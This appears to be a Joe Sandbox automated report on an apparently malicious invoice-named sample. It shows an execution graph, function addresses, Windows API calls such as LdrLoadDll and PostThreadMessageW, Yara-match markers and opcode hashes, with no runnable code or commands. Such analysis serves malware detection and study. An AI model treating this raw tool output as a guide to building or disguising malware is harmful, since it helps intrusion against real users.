                                                                                                                                execution_graph 95656 42bc63 95657 42bc80 95656->95657 95660 1742df0 LdrInitializeThunk 95657->95660 95658 42bca5 95660->95658 95661 424dc3 95666 424ddc 95661->95666 95662 424e69 95663 424e24 95669 42e6c3 95663->95669 95666->95662 95666->95663 95667 424e64 95666->95667 95668 42e6c3 RtlFreeHeap 95667->95668 95668->95662 95672 42c983 95669->95672 95671 424e34 95673 42c99d 95672->95673 95674 42c9ab RtlFreeHeap 95673->95674 95674->95671 95675 42f883 95676 42f893 95675->95676 95677 42f899 95675->95677 95680 42e7a3 95677->95680 95679 42f8bf 95683 42c943 95680->95683 95682 42e7be 95682->95679 95684 42c95d 95683->95684 95685 42c96b RtlAllocateHeap 95684->95685 95685->95682 95782 424a33 95783 424a4f 95782->95783 95784 424a77 95783->95784 95785 424a8b 95783->95785 95786 42c633 NtClose 95784->95786 95787 42c633 NtClose 95785->95787 95788 424a80 95786->95788 95789 424a94 95787->95789 95792 42e7e3 RtlAllocateHeap 95789->95792 95791 424a9f 95792->95791 95686 413fe3 95687 413ffd 95686->95687 95692 4177a3 95687->95692 95689 41401b 95690 414060 95689->95690 95691 41404f PostThreadMessageW 95689->95691 95691->95690 95693 4177c7 95692->95693 95694 417803 LdrLoadDll 95693->95694 95695 4177ce 95693->95695 95694->95695 95695->95689 95793 41b313 95794 41b357 95793->95794 95795 42c633 NtClose 95794->95795 95796 41b378 95794->95796 95795->95796 95797 41e513 95798 41e539 95797->95798 95804 41e639 95798->95804 95806 42f9b3 95798->95806 95800 41e5ce 95801 41e630 95800->95801 95802 42bcb3 LdrInitializeThunk 95800->95802 95800->95804 95801->95804 95812 428a33 95801->95812 95802->95801 95805 41e6eb 95807 42f923 95806->95807 95808 42e7a3 RtlAllocateHeap 95807->95808 95809 42f980 95807->95809 95810 42f95d 95808->95810 95809->95800 95811 42e6c3 RtlFreeHeap 95810->95811 95811->95809 95813 428a98 95812->95813 95814 428ad3 95813->95814 95817 418b73 95813->95817 95814->95805 95816 428ab5 95816->95805 95818 418b98 95817->95818 95819 418b37 95817->95819 95818->95818 95820 42c9c3 ExitProcess 95819->95820 95821 418b5b 95820->95821 95821->95816 95822 1742b60 LdrInitializeThunk 95823 413ad7 95824 413a9e 95823->95824 95827 42c8b3 95824->95827 95828 42c8d0 95827->95828 95831 1742c70 LdrInitializeThunk 95828->95831 95829 413aa5 95831->95829 95832 418d78 95833 42c633 NtClose 95832->95833 95834 418d82 95833->95834 95696 401a8a 95697 401a9f 95696->95697 95700 42fd53 95697->95700 95703 42e273 95700->95703 95704 42e299 95703->95704 95715 4076b3 95704->95715 95706 42e2af 95714 401ad8 95706->95714 95718 41b123 95706->95718 95708 42e2ce 95711 42e2e3 95708->95711 95733 42c9c3 95708->95733 95729 428343 95711->95729 95712 42e2fd 95713 42c9c3 ExitProcess 95712->95713 95713->95714 95717 4076c0 95715->95717 95736 416453 95715->95736 95717->95706 95719 41b14f 95718->95719 95754 41b013 95719->95754 95722 41b17c 95725 41b187 95722->95725 95760 42c633 95722->95760 95723 41b194 95724 41b1b0 95723->95724 95727 42c633 NtClose 95723->95727 95724->95708 95725->95708 95728 41b1a6 95727->95728 95728->95708 95730 4283a5 95729->95730 95732 4283b2 95730->95732 95768 418623 95730->95768 95732->95712 95734 42c9dd 95733->95734 95735 42c9ee ExitProcess 95734->95735 95735->95711 95737 416470 95736->95737 95739 416486 95737->95739 95740 42d053 95737->95740 95739->95717 95742 42d06d 95740->95742 95741 42d09c 95741->95739 95742->95741 95747 42bcb3 95742->95747 95745 42e6c3 RtlFreeHeap 95746 42d112 95745->95746 95746->95739 95748 42bccd 95747->95748 95751 1742c0a 95748->95751 95749 42bcf6 95749->95745 95752 1742c11 95751->95752 95753 1742c1f LdrInitializeThunk 95751->95753 95752->95749 95753->95749 95755 41b02d 95754->95755 95759 41b109 95754->95759 95763 42bd53 95755->95763 95758 42c633 NtClose 95758->95759 95759->95722 95759->95723 95761 42c650 95760->95761 95762 42c65e NtClose 95761->95762 95762->95725 95764 42bd70 95763->95764 95767 17435c0 LdrInitializeThunk 95764->95767 95765 41b0fd 95765->95758 95767->95765 95770 41864d 95768->95770 95769 418b5b 95769->95732 95770->95769 95776 413c63 95770->95776 95772 41877a 95772->95769 95773 42e6c3 RtlFreeHeap 95772->95773 95774 418792 95773->95774 95774->95769 95775 42c9c3 ExitProcess 95774->95775 95775->95769 95780 413c83 95776->95780 95778 413ce2 95778->95772 95779 413cec 95779->95772 95780->95779 95781 41b433 RtlFreeHeap LdrInitializeThunk 95780->95781 95781->95778

                                                                                                                                Executed Functions

                                                                                                                                Function 004177A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 89 4177a3-4177cc call 42f3c3 92 4177d2-4177e0 call 42f9c3 89->92 93 4177ce-4177d1 89->93 96 4177f0-417801 call 42dd43 92->96 97 4177e2-4177ed call 42fc63 92->97 102 417803-417817 LdrLoadDll 96->102 103 41781a-41781d 96->103 97->96 102->103
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417815
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: f4492ed622b56aa1196f4befe6511e7e75e319fef14f2bce32a757fa58cfd677
                                                                                                                                • Instruction ID: 41c8be0a6ead07329e25775236540c953bea5c288bd4df13a44555af71a5b013
                                                                                                                                • Opcode Fuzzy Hash: f4492ed622b56aa1196f4befe6511e7e75e319fef14f2bce32a757fa58cfd677
                                                                                                                                • Instruction Fuzzy Hash: DB0152B5E0410DABDB10DAA5DC42FDEB3789B54308F4081A6E91897240F634EB588B55
                                                                                                                                Function 0042C633 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 109 42c633-42c66c call 404973 call 42d833 NtClose
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C667
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: e2330e1e311a6ff0016a626a075a4b11d39da747239e512168a5ca50c78264f5
                                                                                                                                • Instruction ID: d0d22ba91029a4f792cddfcfe750393288fcb6615584d3f7f16b0b1371e9fe4d
                                                                                                                                • Opcode Fuzzy Hash: e2330e1e311a6ff0016a626a075a4b11d39da747239e512168a5ca50c78264f5
                                                                                                                                • Instruction Fuzzy Hash: 9DE04F756002147BD120FA5ADC41E9B776CDBC5714F40441AFA1867241D670B90187F4
                                                                                                                                Function 01742B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 123 1742b60-1742b6c LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: bcaa65071f60dff3365f4bea986bdab5fe09d35b13606f4c1cecdbe86b2b5f78
                                                                                                                                • Instruction ID: 7abe4184fa686f7f5455c3c33466152b3cc673b8a26a15b33b6be8058f1e03f8
                                                                                                                                • Opcode Fuzzy Hash: bcaa65071f60dff3365f4bea986bdab5fe09d35b13606f4c1cecdbe86b2b5f78
                                                                                                                                • Instruction Fuzzy Hash: F890026120640003434571594414616800A97E0201B55C031F50145A0DC5758A916626
                                                                                                                                Function 01742DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 945009ba6845d8577895c033544c2791e1a0cfcf7e9234a5d362fcb25559eec7
                                                                                                                                • Instruction ID: 3b1ddb87a52168808ae43327f2463667d02743fe21dfa92b13464793af2054e6
                                                                                                                                • Opcode Fuzzy Hash: 945009ba6845d8577895c033544c2791e1a0cfcf7e9234a5d362fcb25559eec7
                                                                                                                                • Instruction Fuzzy Hash: C090023120540413D35171594504707400997D0241F95C422B4424568DD6A68B52A622
                                                                                                                                Function 01742C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 124 1742c70-1742c7c LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 184b74c935527ad52cf5c16658590fd8caff6f7798e5a2dcf3432f310cfe8e50
                                                                                                                                • Instruction ID: 45dbff39234b14f64be5e7ae5c395754118e1d7706b0eab7d973c9a8e1980548
                                                                                                                                • Opcode Fuzzy Hash: 184b74c935527ad52cf5c16658590fd8caff6f7798e5a2dcf3432f310cfe8e50
                                                                                                                                • Instruction Fuzzy Hash: DD90023120548803D3507159840474A400597D0301F59C421B8424668DC6E58A917622
                                                                                                                                Function 017435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 4fb63c0ae15527ac315c5aebb841aa6a62acac13c0f88e6800584303c048b897
                                                                                                                                • Instruction ID: 3c45f9811f532cf6b4fb82707dff07d38880efc0048497073476681616091b32
                                                                                                                                • Opcode Fuzzy Hash: 4fb63c0ae15527ac315c5aebb841aa6a62acac13c0f88e6800584303c048b897
                                                                                                                                • Instruction Fuzzy Hash: 6E90023160950403D34071594514706500597D0201F65C421B4424578DC7E58B516AA3
                                                                                                                                Function 00418575 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <
                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                • Opcode ID: 5e459200554ba2946136690f281c35965bff425730dcc3ca59245ede226d87eb
                                                                                                                                • Instruction ID: 03c7e8ddc0e474e90ffe38ca279911681d61b404dc7d42cb07bfc3d352dbe8e8
                                                                                                                                • Opcode Fuzzy Hash: 5e459200554ba2946136690f281c35965bff425730dcc3ca59245ede226d87eb
                                                                                                                                • Instruction Fuzzy Hash: 8691BFB0E01229EFDB24DF55C881AEEB7B9BF44740F1041AEE418A7341DB785A81CF99
                                                                                                                                Function 0041850B Relevance: .2, Instructions: 197COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cb03588419975fed05d8a6b080b52eba6e80e5903ea7a1ba18e6bcf9b3454244
                                                                                                                                • Instruction ID: 8c18485b877a3d609a2e8cb4547ab2d093a930af731ae1174e58ffd859a5638a
                                                                                                                                • Opcode Fuzzy Hash: cb03588419975fed05d8a6b080b52eba6e80e5903ea7a1ba18e6bcf9b3454244
                                                                                                                                • Instruction Fuzzy Hash: 13716DB0E01229EFDB24DF55C881AEEB7B5AF44704F20419EE419A7341DB786A81CF99
                                                                                                                                Function 00413E9C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 413e9c-413ea3 1 413ea5-413ea7 0->1 2 413efb-413f74 0->2 3 413ea9-413eb7 1->3 4 413e9b 1->4 7 413f76-413f87 2->7 8 413faa-413fbe 2->8 3->2 4->0 9 413fc1-413fde 8->9 10 414027-41404d call 424ee3 8->10 13 41406d-414073 10->13 14 41404f-41405e PostThreadMessageW 10->14 14->13 15 414060-41406a 14->15 15->13
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 7-j38IBI$7-j38IBI
                                                                                                                                • API String ID: 0-374207719
                                                                                                                                • Opcode ID: 507a5f4515b1976fab8b538e4586a5bdefc63c3b679351c3434526897b152a86
                                                                                                                                • Instruction ID: d42cea57591d29488d58ef37d023b644321dc0543e637e2f4459e60e685a3532
                                                                                                                                • Opcode Fuzzy Hash: 507a5f4515b1976fab8b538e4586a5bdefc63c3b679351c3434526897b152a86
                                                                                                                                • Instruction Fuzzy Hash: 8A21A272904695AAE711CAB99C428EFBFBCFE51314B444299F990DB301D71A8D4783A1
                                                                                                                                Function 00413FE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 16 413fe3-414020 call 42e763 call 42f173 call 4177a3 23 414027-41404d call 424ee3 16->23 24 414022 call 4048e3 16->24 27 41406d-414073 23->27 28 41404f-41405e PostThreadMessageW 23->28 24->23 28->27 29 414060-41406a 28->29 29->27
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(7-j38IBI,00000111,00000000,00000000), ref: 0041405A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 7-j38IBI$7-j38IBI
                                                                                                                                • API String ID: 1836367815-374207719
                                                                                                                                • Opcode ID: 2403aeddb0c0cc6fd5a8c8ceb9e1c33ae8b2bfb02f2a11c80be38720c90e85aa
                                                                                                                                • Instruction ID: fda06c36c081d625574290fe6d5e050c9803474a7ae727b3da1da25eef1c90c8
                                                                                                                                • Opcode Fuzzy Hash: 2403aeddb0c0cc6fd5a8c8ceb9e1c33ae8b2bfb02f2a11c80be38720c90e85aa
                                                                                                                                • Instruction Fuzzy Hash: D301DBB1D4011C7AEB10AAE2DC81DEF7B7CDF81798F458069FA1477141D5784E0687B5
                                                                                                                                Function 0042C983 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 39 42c983-42c9c1 call 404973 call 42d833 RtlFreeHeap
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9BC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID: dA
                                                                                                                                • API String ID: 3298025750-3833285433
                                                                                                                                • Opcode ID: d18bb24bc6d8e356c38d33564657dd5783140c92d5f5953abc714d348d1e6449
                                                                                                                                • Instruction ID: 0b343d4c7c9a842d7fb773ce56e72f0a67d98da2edc5e991cd24ddd6be6b645b
                                                                                                                                • Opcode Fuzzy Hash: d18bb24bc6d8e356c38d33564657dd5783140c92d5f5953abc714d348d1e6449
                                                                                                                                • Instruction Fuzzy Hash: 62E092B16002047BCA10EE59DC41F9B73ACDFC9710F00401EFD08A7241C670B911C7B8
                                                                                                                                Function 0042C943 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 104 42c943-42c981 call 404973 call 42d833 RtlAllocateHeap
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E5CE,?,?,00000000,?,0041E5CE,?,?,?), ref: 0042C97C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: 7fa87606b4b4779bf62fdda62ff41cb591a8ff84e810adbb296462deacfd7513
                                                                                                                                • Instruction ID: 7e98b705fb9be36375d09d1fc28f2164ff1a973549178037d1697746a6b94e86
                                                                                                                                • Opcode Fuzzy Hash: 7fa87606b4b4779bf62fdda62ff41cb591a8ff84e810adbb296462deacfd7513
                                                                                                                                • Instruction Fuzzy Hash: 93E092B16042047BD610EF59DC41E9B73ACDFC5714F004019FE08A7281C774B911C7B8
                                                                                                                                Function 0042C9C3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 114 42c9c3-42c9fc call 404973 call 42d833 ExitProcess
                                                                                                                                APIs
                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,C9BCB0A8,?,?,C9BCB0A8), ref: 0042C9F7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_400000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 621844428-0
                                                                                                                                • Opcode ID: 9ca385ca778ee391880d37df6656d388d9ccedf2d2503e84f932c495440849bf
                                                                                                                                • Instruction ID: c609a1552ec9809ec83f03628b72085ea24c65a4d49c11b962de4c14aa97bd4d
                                                                                                                                • Opcode Fuzzy Hash: 9ca385ca778ee391880d37df6656d388d9ccedf2d2503e84f932c495440849bf
                                                                                                                                • Instruction Fuzzy Hash: 06E04F726006147BD620BA6AEC01F9B776CDBC5714F40442AFA0867241C675B901C7B4
                                                                                                                                Function 01742C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 119 1742c0a-1742c0f 120 1742c11-1742c18 119->120 121 1742c1f-1742c26 LdrInitializeThunk 119->121
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: c0d487c8febd6bf47e4aa1beac6d09340370d64adda86dba9d79105c0fce94c9
                                                                                                                                • Instruction ID: 4120f5aa1f13cdcfec93cfaf7f7068f83afa9ed5482b727c8ca21a76aa83ee9d
                                                                                                                                • Opcode Fuzzy Hash: c0d487c8febd6bf47e4aa1beac6d09340370d64adda86dba9d79105c0fce94c9
                                                                                                                                • Instruction Fuzzy Hash: 26B09B719055C5C7DB51E7645608717B90077D0701F15C071F2030651F4778C1D1E676

                                                                                                                                Non-executed Functions

                                                                                                                                Function 01782349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                • Opcode ID: 192a0d4030ce1d9d48c27f2531059ec41d6bd3e56db3089087ce38cec885852c
                                                                                                                                • Instruction ID: 22144fbeb7ea1effe99ef5467077377cb3e7f5df00490164185197bc76899a88
                                                                                                                                • Opcode Fuzzy Hash: 192a0d4030ce1d9d48c27f2531059ec41d6bd3e56db3089087ce38cec885852c
                                                                                                                                • Instruction Fuzzy Hash: 2B92AE71688342AFE721EF19C884B6BFBE8BB84711F04491DFA95D7292D770E844CB52
                                                                                                                                Function 01738620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • Critical section address., xrefs: 01775502
                                                                                                                                • Invalid debug info address of this critical section, xrefs: 017754B6
                                                                                                                                • double initialized or corrupted critical section, xrefs: 01775508
                                                                                                                                • Thread identifier, xrefs: 0177553A
                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754CE
                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0177540A, 01775496, 01775519
                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01775543
                                                                                                                                • undeleted critical section in freed memory, xrefs: 0177542B
                                                                                                                                • 8, xrefs: 017752E3
                                                                                                                                • Critical section address, xrefs: 01775425, 017754BC, 01775534
                                                                                                                                • Address of the debug info found in the active list., xrefs: 017754AE, 017754FA
                                                                                                                                • Critical section debug info address, xrefs: 0177541F, 0177552E
                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754E2
                                                                                                                                • corrupted critical section, xrefs: 017754C2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                • Opcode ID: fe7728f141afb6a7b837fa7c85cc45c2cfe75ffce9fd41eb0f42c60f109e265a
                                                                                                                                • Instruction ID: bafe6f8826c1a32e7dad4c35f5596200912477f8b98df7d34398c4f5bd4d999d
                                                                                                                                • Opcode Fuzzy Hash: fe7728f141afb6a7b837fa7c85cc45c2cfe75ffce9fd41eb0f42c60f109e265a
                                                                                                                                • Instruction Fuzzy Hash: 8E8167B1A01358EADB20CB99CC48BAEFBB9EB48714F244259F505B7291D375A940CB60
                                                                                                                                Function 017329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01772498
                                                                                                                                • @, xrefs: 0177259B
                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0177261F
                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017725EB
                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017722E4
                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01772412
                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01772602
                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01772624
                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017724C0
                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01772409
                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01772506
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
